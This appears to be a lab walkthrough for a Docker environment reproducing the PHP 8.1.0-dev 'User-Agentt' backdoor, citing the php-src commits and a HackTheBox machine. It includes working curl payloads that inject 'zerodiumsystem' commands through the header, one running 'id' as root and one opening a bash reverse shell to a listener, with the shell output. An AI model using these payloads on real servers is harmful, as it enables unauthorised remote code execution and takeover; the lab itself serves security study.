References:
- PHP 8.1.0-dev User-Agentt Backdoor
- https://news-web.php.net/php.internals/113838
- https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d
- https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
- HackTheBox - Knife (PHP 8.1.0-dev User-Agentt)
If you doesn't have docker-compose
. First let's install docker-compose
to your operating system.
$ sudo apt-get install docker-compose
Docker command to build dockerfile
$ docker-compose up -d
$ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
4607c17c5b06 vulhub/php:8.1-backdoor "php -S 0.0.0.0:80 -…" 11 minutes ago Up 11 minutes 0.0.0.0:8080->80/tcp, :::8080->80/tcp php-81-dev_web_1
runs the service at http://youripaddress:8080
or http://0.0.0.0:8080
Command Injection
$ curl -H "User-Agentt: zerodiumsystem('id');" 'http://172.17.0.1:8080'
uid=0(root) gid=0(root) groups=0(root)
testing, hello world page
via burp suite
Remote Code Execution using curl
$ curl -H "User-Agentt: zerodiumsystem(\"bash -c 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'\");" 'http://172.17.0.1:8080'
Output
$ nc -lvnp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.18.0.2.
Ncat: Connection from 172.18.0.2:35820.
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@4607c17c5b06:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
root@4607c17c5b06:/var/www/html#
via burp suite